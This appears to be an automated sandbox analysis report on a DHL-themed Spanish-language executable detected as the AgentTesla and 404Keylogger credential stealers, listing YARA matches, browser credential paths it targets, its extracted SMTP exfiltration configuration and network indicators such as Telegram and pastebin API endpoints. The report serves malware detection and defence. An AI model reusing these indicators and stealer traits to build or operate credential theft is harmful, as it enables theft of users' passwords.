Play interactive tour

Edit tour

Analysis Report Recibo de entrega de DHL.exe

Overview

General Information

Sample Name:	Recibo de entrega de DHL.exe
Analysis ID:	358255
MD5:	335a69ee25155d53f6df46c020aa90cd
SHA1:	cbecea1d93ff376b6a7f5ea72c191d4020372344
SHA256:	66dd2c7ac2b0bc7b604efa99f21a828da26c15a366a2e809e23b82dda44b63dd
Tags:	DHLESPexegeo
Infos:
Most interesting Screenshot:

Detection

404Keylogger AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected 404Keylogger

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains very large strings

.NET source code references suspicious native API functions

Binary contains a suspicious time stamp

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for sample

May check the online IP address of the machine

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

Recibo de entrega de DHL.exe (PID: 7008 cmdline: 'C:\Users\user\Desktop\Recibo de entrega de DHL.exe' MD5: 335A69EE25155D53F6DF46C020AA90CD)

Recibo de entrega de DHL.exe (PID: 6416 cmdline: C:\Users\user\Desktop\Recibo de entrega de DHL.exe MD5: 335A69EE25155D53F6DF46C020AA90CD)

Recibo de entrega de DHL.exe (PID: 2912 cmdline: C:\Users\user\Desktop\Recibo de entrega de DHL.exe MD5: 335A69EE25155D53F6DF46C020AA90CD)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "moin.ansari@sapgroup.com.pk", "ByHost: ": "mail.sapgroup.com.pk:587", "Password: ": "", "From: ": "moin.ansari@sapgroup.com.pk"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Recibo de entrega de DHL.exe PID: 7008	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
Process Memory Space: Recibo de entrega de DHL.exe PID: 7008	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Recibo de entrega de DHL.exe PID: 7008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Recibo de entrega de DHL.exe PID: 2912	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
Process Memory Space: Recibo de entrega de DHL.exe PID: 2912	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Recibo de entrega de DHL.exe PID: 2912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x17588:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1693a:$a3: \Google\Chrome\User Data\Default\Login Data 0x16db0:$a4: \Orbitum\User Data\Default\Login Data
0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.Recibo de entrega de DHL.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19388:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1873a:$a3: \Google\Chrome\User Data\Default\Login Data 0x18bb0:$a4: \Orbitum\User Data\Default\Login Data
5.2.Recibo de entrega de DHL.exe.400000.0.unpack	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
5.2.Recibo de entrega de DHL.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0xad438:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc9278:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xac7ea:$a3: \Google\Chrome\User Data\Default\Login Data 0xc862a:$a3: \Google\Chrome\User Data\Default\Login Data 0xacc60:$a4: \Orbitum\User Data\Default\Login Data 0xc8aa0:$a4: \Orbitum\User Data\Default\Login Data
0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Recibo de entrega de DHL.exe.2d79518.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19388:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x351c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1873a:$a3: \Google\Chrome\User Data\Default\Login Data 0x3457a:$a3: \Google\Chrome\User Data\Default\Login Data 0x18bb0:$a4: \Orbitum\User Data\Default\Login Data 0x349f0:$a4: \Orbitum\User Data\Default\Login Data
0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Recibo de entrega de DHL.exe.3dd2ac0.2.raw.unpack	JoeSecurity_404Keylogger	Yara detected 404Keylogger	Joe Security
0.2.Recibo de entrega de DHL.exe.3dd2ac0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 10 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: Recibo de entrega de DHL.exe.2912.5.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "moin.ansari@sapgroup.com.pk", "ByHost: ": "mail.sapgroup.com.pk:587", "Password: ": "", "From: ": "moin.ansari@sapgroup.com.pk"}

Multi AV Scanner detection for submitted file

Show sources

Source: Recibo de entrega de DHL.exe	Virustotal: Detection: 31%			Perma Link
Source: Recibo de entrega de DHL.exe	ReversingLabs: Detection: 12%

Machine Learning detection for sample

Show sources

Source: Recibo de entrega de DHL.exe

Joe Sandbox ML: detected

Source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack

Avira: Label: TR/ATRAPS.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: Recibo de entrega de DHL.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Recibo de entrega de DHL.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 95.215.225.23:587

Source: Joe Sandbox View	IP Address: 131.186.113.70 131.186.113.70
Source: Joe Sandbox View	IP Address: 95.215.225.23 95.215.225.23

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 95.215.225.23:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: Recibo de entrega de DHL.exe, 00000005.00000002.906675983.0000000002DDD000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906659544.0000000002DCC000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906616096.0000000002D71000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906659544.0000000002DCC000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org41k
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Recibo de entrega de DHL.exe, 00000005.00000002.905948918.0000000001189000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.sapgroup.com.pk
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: http://sapgroup.com.pk
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.906616096.0000000002D71000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Recibo de entrega de DHL.exe	String found in binary or memory: http://tempuri.org/NorthWindAzureForInsertsDataSet.xsd
Source: Recibo de entrega de DHL.exe, 00000000.00000003.642797524.0000000006118000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Recibo de entrega de DHL.exe, 00000000.00000002.662987849.000000000610A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.come.com
Source: Recibo de entrega de DHL.exe, 00000000.00000002.662987849.000000000610A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.640725684.000000000611B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Recibo de entrega de DHL.exe, 00000000.00000003.640696140.000000000611B000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.640811691.000000000611B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comn
Source: Recibo de entrega de DHL.exe, 00000000.00000003.641863100.000000000610E000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Recibo de entrega de DHL.exe, 00000000.00000003.641863100.000000000610E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnT
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000000.00000003.643821183.000000000610A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/1
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/A
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/E
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643616679.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/N
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643821183.000000000610A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/S
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/es-e
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/1
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/A
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/nl-nj
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643521981.000000000610C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/w
Source: Recibo de entrega de DHL.exe, 00000000.00000003.643648865.0000000006108000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/xt
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Recibo de entrega de DHL.exe, 00000000.00000002.665864843.0000000007312000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://myip.dnsomatic.com9====
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://pastebin.com/api/api_login.php
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://pastebin.com/api/api_login.phpJhttps://pastebin.com/api/api_post.php
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Recibo de entrega de DHL.exe, 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://pastebin.com/api/api_post.php
Source: Recibo de entrega de DHL.exe, 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected 404Keylogger

Show sources

Source: Yara match	File source: 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 7008, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 2912, type: MEMORY
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3dd2ac0.2.raw.unpack, type: UNPACKEDPE

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Recibo de entrega de DHL.exe

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

.NET source code contains very large strings

Show sources

Source: Recibo de entrega de DHL.exe, Form1.cs	Long String: Length: 13656
Source: 0.0.Recibo de entrega de DHL.exe.a00000.0.unpack, Form1.cs	Long String: Length: 13656
Source: 0.2.Recibo de entrega de DHL.exe.a00000.0.unpack, Form1.cs	Long String: Length: 13656
Source: 4.2.Recibo de entrega de DHL.exe.310000.0.unpack, Form1.cs	Long String: Length: 13656
Source: 4.0.Recibo de entrega de DHL.exe.310000.0.unpack, Form1.cs	Long String: Length: 13656
Source: 5.0.Recibo de entrega de DHL.exe.9f0000.0.unpack, Form1.cs	Long String: Length: 13656
Source: 5.2.Recibo de entrega de DHL.exe.9f0000.1.unpack, Form1.cs	Long String: Length: 13656

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 0_2_00A0ADD9
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 0_2_02CBC148
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 0_2_02CBA758
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 0_2_05895FB8
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 4_2_0031ADD9
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_009FADD9
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_02BA2728
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_02BAB4B8
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_02BAD4F0
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_02BABD88
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_02BAB170
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Code function: 5_2_02BA6FA0

Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelilba.exe4 vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000000.00000002.667225265.0000000007720000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000000.00000002.659157889.0000000000A5E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamec.exe< vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000004.00000002.656059575.000000000036E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamec.exe< vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000005.00000002.905582160.0000000000A4E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamec.exe< vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000005.00000002.905614308.0000000000BE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000005.00000002.905770245.0000000000F40000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe, 00000005.00000002.905508557.000000000041E000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamelilba.exe4 vs Recibo de entrega de DHL.exe
Source: Recibo de entrega de DHL.exe	Binary or memory string: OriginalFilenamec.exe< vs Recibo de entrega de DHL.exe

Source: Recibo de entrega de DHL.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: Recibo de entrega de DHL.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

